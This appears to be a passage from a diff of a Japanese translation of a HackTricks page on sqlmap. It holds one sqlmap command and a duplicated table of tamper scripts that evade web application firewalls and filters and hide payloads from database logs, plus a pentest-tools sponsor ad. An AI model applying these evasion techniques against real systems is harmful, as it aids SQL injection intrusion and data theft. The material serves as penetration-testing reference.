{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -156,56 +156,56 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
```
| Tamper | Description |
| ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
| apostrophemask.py | アポストロフィ文字をそのUTF-8全角対応文字に置き換えます。 |
| apostrophenullencode.py | アポストロフィ文字をその不正な二重Unicode対応文字に置き換えます。 |
| appendnullbyte.py | ペイロードの末尾にエンコードされたNULLバイト文字を追加します。 |
| base64encode.py | 指定されたペイロード内のすべての文字をBase64エンコードします。 |
| between.py | 大なり演算子('>')を 'NOT BETWEEN 0 AND #' に置き換えます。 |
| bluecoat.py | SQL文の後のスペース文字を有効なランダムな空白文字に置き換えます。その後、文字 '=' を LIKE 演算子に置き換えます。 |
| chardoubleencode.py | 指定されたペイロード内のすべての文字を二重URLエンコードしますすでにエンコードされたものは処理しません。 |
| commalesslimit.py | 'LIMIT M, N' のようなインスタンスを 'LIMIT N OFFSET M' に置き換えます。 |
| commalessmid.py | 'MID(A, B, C)' のようなインスタンスを 'MID(A FROM B FOR C)' に置き換えます。 |
| concat2concatws.py | 'CONCAT(A, B)' のようなインスタンスを 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' に置き換えます。 |
| charencode.py | 指定されたペイロード内のすべての文字をURLエンコードしますすでにエンコードされたものは処理しません。 |
| charunicodeencode.py | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされたものは処理しません。 "%u0022" |
| charunicodeescape.py | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされたものは処理しません。 "\u0022" |
| equaltolike.py | 演算子等号('=')のすべての出現を演算子 'LIKE' に置き換えます。 |
| escapequotes.py | クォート(' と ")をスラッシュでエスケープします。 |
| greatest.py | 大なり演算子('>')を 'GREATEST' 対応物に置き換えます。 |
| halfversionedmorekeywords.py | 各キーワードの前にバージョン付きMySQLコメントを追加します。 |
| ifnull2ifisnull.py | 'IFNULL(A, B)' のようなインスタンスを 'IF(ISNULL(A), B, A)' に置き換えます。 |
| modsecurityversioned.py | 完全なクエリをバージョン付きコメントで囲みます。 |
| modsecurityzeroversioned.py | 完全なクエリをゼロバージョン付きコメントで囲みます。 |
| multiplespaces.py | SQLキーワードの周りに複数のスペースを追加します。 |
| nonrecursivereplacement.py | 定義済みのSQLキーワードを置き換えに適した表現に置き換えます.replace("SELECT", "") フィルター)。 |
| percentage.py | 各文字の前にパーセント記号('%')を追加します。 |
| overlongutf8.py | 指定されたペイロード内のすべての文字を変換します(すでにエンコードされたものは処理しません)。 |
| randomcase.py | 各キーワード文字をランダムなケース値に置き換えます。 |
| randomcomments.py | SQLキーワードにランダムなコメントを追加します。 |
| securesphere.py | 特別に作成された文字列を追加します。 |
| sp\_password.py | 自動的にDBMSログから隠すためにペイロードの末尾に 'sp\_password' を追加します。 |
| space2comment.py | スペース文字(' ')をコメントに置き換えます。 |
| space2dash.py | スペース文字(' ')をダッシュコメント('--')に置き換え、その後にランダムな文字列と改行('\n')を追加します。 |
| space2hash.py | スペース文字(' ')をポンド文字('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します。 |
| space2morehash.py | スペース文字(' ')をポンド文字('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します。 |
| space2mssqlblank.py | スペース文字(' ')を有効な代替文字のセットからランダムな空白文字に置き換えます。 |
| space2mssqlhash.py | スペース文字(' ')をポンド文字('#')に置き換え、その後に改行('\n')を追加します。 |
| space2mysqlblank.py | スペース文字(' ')を有効な代替文字のセットからランダムな空白文字に置き換えます。 |
| space2mysqldash.py | スペース文字(' ')をダッシュコメント('--')に置き換え、その後に改行('\n')を追加します。 |
| space2plus.py | スペース文字(' ')をプラス('+')に置き換えます。 |
| space2randomblank.py | スペース文字(' ')を有効な代替文字のセットからランダムな空白文字に置き換えます。 |
| symboliclogical.py | ANDおよびOR論理演算子をその記号対応物&&および)に置き換えます。 |
| unionalltounion.py | UNION ALL SELECT を UNION SELECT に置き換えます。 |
| unmagicquotes.py | クォート文字(')をマルチバイトコンボ %bf%27 と一般的なコメントで置き換えます(機能させるため)。 |
| uppercase.py | 各キーワード文字を大文字の値 'INSERT' に置き換えます。 |
| varnish.py | HTTPヘッダー 'X-originating-IP' を追加します。 |
| versionedkeywords.py | 各非関数キーワードをバージョン付きMySQLコメントで囲みます。 |
| versionedmorekeywords.py | 各キーワードをバージョン付きMySQLコメントで囲みます。 |
| xforwardedfor.py | 偽のHTTPヘッダー 'X-Forwarded-For' を追加します。 |
| apostrophemask.py | アポストロフィ文字をそのUTF-8全幅の対応物に置き換えます。 |
| apostrophenullencode.py | アポストロフィ文字をその不正な二重Unicode対応物に置き換えます。 |
| appendnullbyte.py | ペイロードの末尾にエンコードされたNULLバイト文字を追加します。 |
| base64encode.py | 指定されたペイロード内のすべての文字をBase64エンコードします。 |
| between.py | 大なり演算子('>')を 'NOT BETWEEN 0 AND #' に置き換えます。 |
| bluecoat.py | SQL文の後のスペース文字を有効なランダムな空白文字に置き換えます。その後、文字 '=' を LIKE 演算子に置き換えます。 |
| chardoubleencode.py | 指定されたペイロード内のすべての文字を二重URLエンコードしますすでにエンコードされたものは処理しません |
| commalesslimit.py | 'LIMIT M, N' のようなインスタンスを 'LIMIT N OFFSET M' に置き換えます。 |
| commalessmid.py | 'MID(A, B, C)' のようなインスタンスを 'MID(A FROM B FOR C)' に置き換えます。 |
| concat2concatws.py | 'CONCAT(A, B)' のようなインスタンスを 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' に置き換えます。 |
| charencode.py | 指定されたペイロード内のすべての文字をURLエンコードしますすでにエンコードされたものは処理しません |
| charunicodeencode.py | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされたものは処理しません。 "%u0022" |
| charunicodeescape.py | 指定されたペイロード内の非エンコード文字をUnicode URLエンコードしますすでにエンコードされたものは処理しません。 "\u0022" |
| equaltolike.py | 演算子等号('=')のすべての出現を演算子 'LIKE' に置き換えます。 |
| escapequotes.py | スラッシュで引用符(' と ")をエスケープします。 |
| greatest.py | 大なり演算子('>')を 'GREATEST' 対応物に置き換えます。 |
| halfversionedmorekeywords.py | 各キーワードの前にバージョン付きMySQLコメントを追加します。 |
| ifnull2ifisnull.py | 'IFNULL(A, B)' のようなインスタンスを 'IF(ISNULL(A), B, A)' に置き換えます。 |
| modsecurityversioned.py | 完全なクエリをバージョン付きコメントで囲みます。 |
| modsecurityzeroversioned.py | 完全なクエリをゼロバージョン付きコメントで囲みます。 |
| multiplespaces.py | SQLキーワードの周りに複数のスペースを追加します。 |
| nonrecursivereplacement.py | 定義済みのSQLキーワードを置き換えに適した表現に置き換えます.replace("SELECT", "") フィルター)。 |
| percentage.py | 各文字の前にパーセント記号('%')を追加します。 |
| overlongutf8.py | 指定されたペイロード内のすべての文字を変換します(すでにエンコードされたものは処理しません)。 |
| randomcase.py | 各キーワード文字をランダムなケース値に置き換えます。 |
| randomcomments.py | SQLキーワードにランダムなコメントを追加します。 |
| securesphere.py | 特別に作成された文字列を追加します。 |
| sp\_password.py | 自動的にDBMSログからの難読化のためにペイロードの末尾に 'sp\_password' を追加します。 |
| space2comment.py | スペース文字(' ')をコメントに置き換えます。 |
| space2dash.py | スペース文字(' ')をダッシュコメント('--')に置き換え、その後にランダムな文字列と改行('\n')を追加します。 |
| space2hash.py | スペース文字(' ')をポンド文字('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します。 |
| space2morehash.py | スペース文字(' ')をポンド文字('#')に置き換え、その後にランダムな文字列と改行('\n')を追加します。 |
| space2mssqlblank.py | スペース文字(' ')を有効な代替文字のセットからランダムな空白文字に置き換えます。 |
| space2mssqlhash.py | スペース文字(' ')をポンド文字('#')に置き換え、その後に改行('\n')を追加します。 |
| space2mysqlblank.py | スペース文字(' ')を有効な代替文字のセットからランダムな空白文字に置き換えます。 |
| space2mysqldash.py | スペース文字(' ')をダッシュコメント('--')に置き換え、その後に改行('\n')を追加します。 |
| space2plus.py | スペース文字(' ')をプラス('+')に置き換えます。 |
| space2randomblank.py | スペース文字(' ')を有効な代替文字のセットからランダムな空白文字に置き換えます。 |
| symboliclogical.py | ANDおよびOR論理演算子をその記号対応物&&および)に置き換えます。 |
| unionalltounion.py | UNION ALL SELECT を UNION SELECT に置き換えます。 |
| unmagicquotes.py | 引用文字(')をマルチバイトコンボ %bf%27 に置き換え、最後に一般的なコメントを追加します(動作させるため)。 |
| uppercase.py | 各キーワード文字を大文字の値 'INSERT' に置き換えます。 |
| varnish.py | HTTPヘッダー 'X-originating-IP' を追加します。 |
| versionedkeywords.py | 各非関数キーワードをバージョン付きMySQLコメントで囲みます。 |
| versionedmorekeywords.py | 各キーワードをバージョン付きMySQLコメントで囲みます。 |
| xforwardedfor.py | 偽のHTTPヘッダー 'X-Forwarded-For' を追加します。 |
<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}